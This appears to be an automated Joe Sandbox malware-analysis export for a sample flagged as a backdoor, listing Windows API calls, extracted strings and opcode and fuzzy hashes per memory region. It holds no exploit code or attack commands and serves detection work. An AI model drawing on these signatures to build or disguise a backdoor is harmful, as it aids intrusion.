                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 0af8867cfe21c800871db35ac46fe2202cfe2cc267bfeead4fe44aa3b536fd1e
                                                • Instruction ID: 45457dead709c8b37a35e4c8a6b429f8532d71651a4eaa8920b7a7213133afb5
                                                • Opcode Fuzzy Hash: 0af8867cfe21c800871db35ac46fe2202cfe2cc267bfeead4fe44aa3b536fd1e
                                                • Instruction Fuzzy Hash: DEE0EC3198AA31A7D3281BA5BC1DB8B3B59BF49712F054415F70596190DA744449CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 007F2016
                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 007F201B
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 007F2020
                                                  • Part of subcall function 007F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007F311F
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 007F2035
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                • String ID:
                                                • API String ID: 1761009282-0
                                                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                • Instruction ID: 5d6c1d9e852f6535ad044aff937ad30d245fb326ae71adbb76dc9507517a028a
                                                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                • Instruction Fuzzy Hash: 20C04C26009A4CE41C113AB1620B1BD07400E637C4BA220C2EB8017343DE0E0A0BB037
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007E9DF1: GetDC.USER32(00000000), ref: 007E9DF5
                                                  • Part of subcall function 007E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007E9E00
                                                  • Part of subcall function 007E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 007E9E0B
                                                • GetObjectW.GDI32(?,00000018,?), ref: 007E9F8D
                                                  • Part of subcall function 007EA1E5: GetDC.USER32(00000000), ref: 007EA1EE
                                                  • Part of subcall function 007EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 007EA21D
                                                  • Part of subcall function 007EA1E5: ReleaseDC.USER32(00000000,?), ref: 007EA2B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ObjectRelease$CapsDevice
                                                • String ID: (
                                                • API String ID: 1061551593-3887548279
                                                • Opcode ID: 5e9315baa85d90847f022335c31d18ea82e56d09d0b270c4753702f659ca135e
                                                • Instruction ID: 1bec88c9942aa579630d6882cd9f310c9aede0c1e33abdbcfdbff2c7b6a3dab3
                                                • Opcode Fuzzy Hash: 5e9315baa85d90847f022335c31d18ea82e56d09d0b270c4753702f659ca135e
                                                • Instruction Fuzzy Hash: D1812071208248AFC654DF29CC44A2ABBE9FFC8715F00491DF98AD7260DB35AE05DB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _swprintf
                                                • String ID: %ls$%s: %s
                                                • API String ID: 589789837-2259941744
                                                • Opcode ID: 5ef2ad8560be0723b25bf2323d0a46c44e55623607b68260ea25e01c315f84eb
                                                • Instruction ID: 27c60b832c909ddab9312cb029b68a1e7c0a32976070b26a72e591c6cd8a2085
                                                • Opcode Fuzzy Hash: 5ef2ad8560be0723b25bf2323d0a46c44e55623607b68260ea25e01c315f84eb
                                                • Instruction Fuzzy Hash: 1B51E83128E7C0F9EA312AEACC57F367665A70CB00F644917F39A744D1C6FE54E06692
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D7730
                                                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D78CC
                                                  • Part of subcall function 007DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA458
                                                  • Part of subcall function 007DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA489
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$Attributes$H_prologTime
                                                • String ID: :
                                                • API String ID: 1861295151-336475711
                                                • Opcode ID: cd48c86fdf9976e07282370f9dc9e920e2fc52cc798a23f4b82b30c1e4950c66
                                                • Instruction ID: 25e3b3b853d9d21fd6e75130e995bfc2a47c7cedc387fe8fc8c044cff43bf716
                                                • Opcode Fuzzy Hash: cd48c86fdf9976e07282370f9dc9e920e2fc52cc798a23f4b82b30c1e4950c66
                                                • Instruction Fuzzy Hash: 24415371905158EADB25EB50DD59EEEB37CAF45300F00409BB609A3292EB785F84DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: UNC$\\?\
                                                • API String ID: 0-253988292
                                                • Opcode ID: b50a36e1f5f6581af4a2597371cff9d0741a3731d3a8725c288b4f73bef64569
                                                • Instruction ID: 6c6f99f346f703fdf7c8e9f40919da4c6bcb9127db8002f4b5fd41e89b20a1ee
                                                • Opcode Fuzzy Hash: b50a36e1f5f6581af4a2597371cff9d0741a3731d3a8725c288b4f73bef64569
                                                • Instruction Fuzzy Hash: 4F41A135400259EBDB20AF61CC45EEB77BDEF84760B12406BF815A3352E778EA50CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Shell.Explorer$about:blank
                                                • API String ID: 0-874089819
                                                • Opcode ID: d0c8ea7c0d0e28130c67d15f8e812369c28e3aed3ede4095af69c3e5d87a7291
                                                • Instruction ID: 3d2d8594eff5a7a6f8427853cdf6f6e8b8942b0e0792f876e34609a68a554156
                                                • Opcode Fuzzy Hash: d0c8ea7c0d0e28130c67d15f8e812369c28e3aed3ede4095af69c3e5d87a7291
                                                • Instruction Fuzzy Hash: D921A572205345DFCB549F65CC95A2A77A8FF88311B14856DFA098F292DB78EC00CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007DEB92
                                                  • Part of subcall function 007DEB73: GetProcAddress.KERNEL32(008181C0,CryptUnprotectMemory), ref: 007DEBA2
                                                • GetCurrentProcessId.KERNEL32(?,?,?,007DEBEC), ref: 007DEC84
                                                Strings
                                                • CryptUnprotectMemory failed, xrefs: 007DEC7C
                                                • CryptProtectMemory failed, xrefs: 007DEC3B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AddressProc$CurrentProcess
                                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                • API String ID: 2190909847-396321323
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNEL32(00000000,00010000,007E09D0,?,00000000,00000000), ref: 007E08AD
                                                • SetThreadPriority.KERNEL32(?,00000000), ref: 007E08F4
                                                  • Part of subcall function 007D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D6EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Thread$CreatePriority__vswprintf_c_l
                                                • String ID: CreateThread failed
                                                • API String ID: 2655393344-3849766595
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007DDA98: _swprintf.LIBCMT ref: 007DDABE
                                                  • Part of subcall function 007DDA98: _strlen.LIBCMT ref: 007DDADF
                                                  • Part of subcall function 007DDA98: SetDlgItemTextW.USER32(?,0080E154,?), ref: 007DDB3F
                                                  • Part of subcall function 007DDA98: GetWindowRect.USER32(?,?), ref: 007DDB79
                                                  • Part of subcall function 007DDA98: GetClientRect.USER32(?,?), ref: 007DDB85
                                                • GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                • SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                • String ID: 0
                                                • API String ID: 2622349952-4108050209
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,007E0A78,?), ref: 007E0854
                                                • GetLastError.KERNEL32(?), ref: 007E0860
                                                  • Part of subcall function 007D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D6EAF
                                                Strings
                                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 007E0869
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                • API String ID: 1091760877-2248577382
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,007DD32F,?), ref: 007DDA53
                                                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,007DD32F,?), ref: 007DDA61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FindHandleModuleResource
                                                • String ID: RTL
                                                • API String ID: 3537982541-834975271
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CommandLine
                                                • String ID: 0&`
                                                • API String ID: 3253501508-1430707966
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Z${
                                                • API String ID: 0-2824158054
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0P_H
                                                • API String ID: 0-4176970036
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6K_^
                                                • API String ID: 0-960177960
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0P_H
                                                • API String ID: 0-4176970036
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %
                                                • API String ID: 0-2567322570
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e29a9896d75d52d14cd8ea222a65b26e1eef91772a0c0d3a6b8f8bdaea70c56
                                                • Instruction ID: 48f62198a5f20e0e22ca14b1d95bba50980d0b926ba3d5e975e0314d86c45fbe
                                                • Opcode Fuzzy Hash: 6e29a9896d75d52d14cd8ea222a65b26e1eef91772a0c0d3a6b8f8bdaea70c56
                                                • Instruction Fuzzy Hash: FD217F71E1954E8FEB58EB98C8649ECB7A2FFA8304F054379D00DDB2A6DE6468018B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67119cdb12d20c7fd4dac2e4a5281ca7ff8da23d5f08c7aabab721a714747817
                                                • Instruction ID: 50810e26f3fe6cd4ed113cdea393bd5bc2aad4faf53a94d46d2c66e0a73522b1
                                                • Opcode Fuzzy Hash: 67119cdb12d20c7fd4dac2e4a5281ca7ff8da23d5f08c7aabab721a714747817
                                                • Instruction Fuzzy Hash: C5110421F0F68E5FEB289BB484390EC7BA0FF95714F8506BAD45D860A2DD646E41C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09c24e3ec368e2ddc863777797e50c049985689c7d64bb006dacc7dee03831f4
                                                • Instruction ID: f0ab60d59775204becbc5fb3d8b6daa697b9f3d9c9f4c0c6b1f25f8d75980277
                                                • Opcode Fuzzy Hash: 09c24e3ec368e2ddc863777797e50c049985689c7d64bb006dacc7dee03831f4
                                                • Instruction Fuzzy Hash: 97113C71E1991D8FDFA4EB9C9895AEDB7F1FF98300F504266D01DE3292DE3069418B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76a88c984aa8e863f0dff3cefbf7ad4c8338f453d4c4ed3578c0e661f90d6deb
                                                • Instruction ID: e79ee0dbd01a30645e769220e51c088c64fd90f887c0b37de359eebfa6e8caca
                                                • Opcode Fuzzy Hash: 76a88c984aa8e863f0dff3cefbf7ad4c8338f453d4c4ed3578c0e661f90d6deb
                                                • Instruction Fuzzy Hash: 2A110621F0F68E5BEB389BA884351FC7B90EF91214F8606BAD44D820A2DD646E05C740
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4aad18ad82fc1cee7d16fa20a72ffdaabc3572e493dec6e38b8ce8a4c79d1f96
                                                • Instruction ID: 04a7b7e20dccaa887a8ae1a2c1dec7a7f469b56260655235cac90249f787eca4
                                                • Opcode Fuzzy Hash: 4aad18ad82fc1cee7d16fa20a72ffdaabc3572e493dec6e38b8ce8a4c79d1f96
                                                • Instruction Fuzzy Hash: F6019630E1E24D9FEB60AFA498696FC7BF0FF49304F4245B6E40DC20A2DA74A654CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 321718bbfe6ee6a8083fce870be08619d5285ef3bd532574ba02c60377d1f7a8
                                                • Instruction ID: 37a345e5784bc10653271938a4353b81f30ac58de07000cca17bdceeba906347
                                                • Opcode Fuzzy Hash: 321718bbfe6ee6a8083fce870be08619d5285ef3bd532574ba02c60377d1f7a8
                                                • Instruction Fuzzy Hash: F801DB3090F38E4BE73557A149290F87B24FF81204F0907BDD49C420E7DD68A7298792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
